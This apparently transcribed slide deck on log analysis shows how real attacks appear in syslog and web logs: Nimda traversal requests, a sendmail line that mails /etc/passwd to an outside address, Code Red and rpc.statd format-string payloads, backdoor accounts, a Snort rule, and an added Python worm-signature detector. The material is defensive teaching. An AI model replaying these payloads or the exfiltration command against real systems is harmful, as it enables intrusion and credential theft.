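The heartbeat check is the one most people skip: a loghost that stops receiving marks from a host is telling you either that syslog forwarding broke or that the host stopped talking, and both deserve a look.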

Page 79: Most common logging mistakes

• Not ever looking at the logs

• Not thinking about what sorts of system events you’d like to monitor, before you need to find them

• Monitoring firewall and/or IDS logs but not database or Web server logs (that is, watching perimeter security systems but not the ultimate victims of attacks)

Page 80: Most common logging mistakes cont.

• Deciding on logging software, analysis software, rotation schedule, archiving system before you’ve determined what sorts of data to collect, how long to store it, how much you’ll get

• Getting into any conversation on data transfer protocols or XML formatting

Page 81: Application & OS Attack Signatures

Page 82: CERT Advisory CA-2003-07

• Buffer overflow in header processing in sendmail

• Announced 3 March 2003

• Patched systems will log

Dropped invalid comments from header address

Page 83: CERT CA-2003-07 cont.

Mar 11 00:33:53 victim sendmail[313]: h2B5Xmm00313: SYSERR: putoutmsg (attacker): error on output channel sending "503 5.0.0 Need MAIL before RCPT": Broken pipe

Mar 11 00:33:53 victim sendmail[317]: h2B5Xrm00316: Dropped invalid comments from header address

Mar 11 00:33:53 victim sendmail[317]: h2B5Xrm00316: SYSERR(root): Infinite loop in ruleset canonify, rule 16

Page 84: Slapper: Linux/SSL worm

• Apache/mod-SSL worm discovered 13 Sept 2002; exploits buffer overflow in SSL v2

[error] SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page

[error] OpenSSL: error:1407609C:SSL routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking HTTP to HTTPS port!?]

Page 85: Apache Chunked Encoding Vuln

• FreeBSD worm detected in the wild 28 June 2002:

[Sat Jun 29 15:06:40 2002] [notice] child pid 21452 exit signal Segmentation Fault (11)

[Sat Jun 29 15:06:41 2002] [error] [client 172.16.159.57] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

Page 86: CERT Advisory CA-2002-03

• Numerous vulnerabilities in SNMP implementations

• Denial of service in all vulnerable systems

• Buffer overflow/root compromise in some vulnerable systems

• PROTOS test suite publicly available

Page 87: Detecting Use of PROTOS

• Preliminary results for Solaris snmpdx:

• One of the test packets DoSes daemon

• Next test case generates syslog msg:

Feb 12 23:25:48 mordor snmpdx: agent snmpd not responding

Page 88: PROTOS vs. Solaris SNMP

Feb 15 02:06:45 mordor snmpdx: error while receiving a pdu from testmachine.lab.fakename.com.60347: The message has a wrong version (8355711)

Feb 15 02:08:58 mordor snmpdx: SNMP error (UNKNOWN! (65793), 0) sent back to testmachine.lab.fakename.com.61021

Page 89: PROTOS signatures: Snort

alert udp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"Attack using PROTOS Test-Suite-req-app"; content: "|30 26 02 01 00 04 06 70 75 62 6C 69 63 A0 19 02 01 00 02 01 00 02 01 00 30 0E 30 0C 06 08 2B 06 01 02 01 01 05 00 05 00|";)

Page 90: sendmail Exploits

Jul 21 01:25:49 ariel sendmail[308]: BAA00307: [email protected], ctladdr=":/bin/mail [email protected] </etc/passwd", delay=00:00:34, mailer=smtp, relay=bos1h.delphi.com. (192.80.63.8), stat=Sent (Ok.)

Jul 21 01:35:40 ariel sendmail[545]: setsender: "/bin/mail [email protected] </etc/passwd": invalid or unparseable, received from [205.133.101.5]

Jul 21 13:13:04 ariel sendmail[784]: NAA00783: to=\tsutomu, [email protected], delay=00:03:09, mailer=local, stat=Sent

Page 91: Nimda: Worm Sign

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe? /c+dir HTTP/1.0" 404 - "-" "-"

Page 92: Nimda: Worm Sign cont.

204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system3/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
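A detector for the Code Red and Nimda request shapes on pages 36, 91 and 92, as an added example that is not from the slides. It URL-decodes each request repeatedly so the %255c, %25%35%63 and %%35%63 spellings all reduce to a backslash before matching, then reports which clients hit which signature and whether any such request was actually served (a 2xx status) rather than rejected with 404 or 400. The sample lines are constructed from the deck's examples (the Code Red payload is shortened, the last line is ordinary traffic) and the signature patterns are the editor's, not a published rule set.

```python
import re
from urllib.parse import unquote

# Common Log Format: client ident user [time] "method path proto" status size ...
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Defensive signatures for the worm traffic quoted on the slides, applied to the
# decoded path.  Assumed patterns for this example, not an official rule set.
SIGNATURES = {
    "nimda-cmd-exec": re.compile(r'/(cmd|root)\.exe', re.I),
    "code-red-ida": re.compile(r'/default\.ida\?[NX]{20,}', re.I),
    "traversal": re.compile(r'\.\.[\\/]'),
}

# Constructed sample access log modelled on the deck's Nimda and Code Red lines.
SAMPLE_ACCESS_LOG = [
    '204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"',
    '204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '128.101.47.28 - - [28/Sep/2001:00:43:43 -0400] "GET /default.ida?' + 'X' * 224
    + '%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 284 "-" "-"',
    '198.51.100.4 - - [18/Sep/2001:09:40:01 -0500] "GET /index.html HTTP/1.0" 200 1532 "-" "Mozilla/4.0"',
]


def decode_path(path, rounds=3):
    """URL-decode until the string stops changing, so double encoding cannot hide a pattern."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line):
    """Parse one access-log line and tag it with every signature the decoded path matches."""
    m = CLF_RE.match(line)
    if not m:
        return None
    client, _when, _method, path, status, _size = m.groups()
    decoded = decode_path(path)
    tags = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
    return {"client": client, "path": decoded, "status": int(status), "tags": tags}


def scan(lines):
    """Per signature: which clients sent it, and whether the server ever served such a request."""
    by_tag = {}
    for line in lines:
        rec = classify(line)
        if not rec:
            continue
        for tag in rec["tags"]:
            entry = by_tag.setdefault(tag, {"clients": set(), "served": False})
            entry["clients"].add(rec["client"])
            if 200 <= rec["status"] < 300:
                entry["served"] = True
    return by_tag
```

The "served" flag is what turns a worm-sign report into a triage decision: a 404 means the host shrugged the request off, while a 200 on one of these paths is the line you escalate.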

Page 93: Hacked via FTP

Sep 23 17:31:55 www inetd[1638]: pid 28592: exit status 1

Sep 23 17:33:20 www ftpd[28594]: FTP LOGIN REFUSED (ftp in /etc/ftpusers) FROM 203.55.23.150 [203.55.23.150], ftp

Sep 23 17:33:47 www ftpd[28595]: FTP LOGIN REFUSED (ftp in /etc/ftpusers) FROM 203.55.23.150 [203.55.23.150], ftp

Sep 23 17:33:58 www inetd[1638]: pid 28596: exit status 1

Sep 23 17:52:38 www useradd[28609]: new user: name=jogja, uid=506, gid=10, home=/etc/jogja, shell=/bin/bash

Page 94: Hacked via FTP cont.

Sep 23 17:55:34 www PAM_pwdb[28610]: password for (jogja/506) changed by ((null)/0)

Sep 23 17:58:03 www PAM_pwdb[28612]: check pass; user unknown

Sep 23 17:58:04 www login[28612]: FAILED LOGIN 1 FROM 202.155.35.132 FOR ku ^H^H^H^H, User not known to the underlying authentication module

Sep 23 17:58:11 www PAM_pwdb[28612]: authentication failure; (uid=0) -> jogja for login service

Sep 23 17:58:12 www login[28612]: FAILED LOGIN 2 FROM 202.155.35.132 FOR jogja, Authentication failure

Page 95: Why IDS isn’t Enough

Jan 2 16:19:23 yyy.yyy.yyy.yyy snort[1260]: RPC Info Query: 216.216.74.2:963 -> xxx.xxx.xxx.xxx:111

Jan 2 16:19:31 yyy.yyy.yyy.yyy snort[1260]: spp_portscan: portscan status from 216.216.74.2: 2 connections across 1 hosts: TCP(2), UDP(0)

Page 96: Buffer Overflows

Jan 02 16:19:45 xxx.xxx.xxx.xxx rpc.statd[351]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 804971090909090687465676274736f6d616e797265206520726f7220726f66 bffff718 bffff719 bffff71a bffff71b!

Page 97: Buffer Overflown?

Jan 02 16:20:25 xxx.xxx.xxx.xxx adduser[12152]: new user: name=cgi, uid=0, gid=0, home=/home/cgi, shell=/bin/bash

Jan 02 16:22:02 xxx.xxx.xxx.xxx PAM_pwdb[12154]: password for (cgi/0) changed by ((null)/0)

Page 98: SSH CRC-32 Attack

sshd[6169]: fatal: Local: Corrupted check bytes on input.

sshd[6253]: fatal: Local: crc32 compensation attack: network attack detected

Page 99: cachefsd Buffer Overflow

May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped

May 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped

May 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup

Page 100: What’s Interesting? cont.

Jun 26 16:48:11 grolsch rpc.statd[382]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

Page 101: What does it take?

The common item to look for when reviewing log files is anything that appears out of the ordinary.

CERT Coordination Center Intrusion Detection Checklist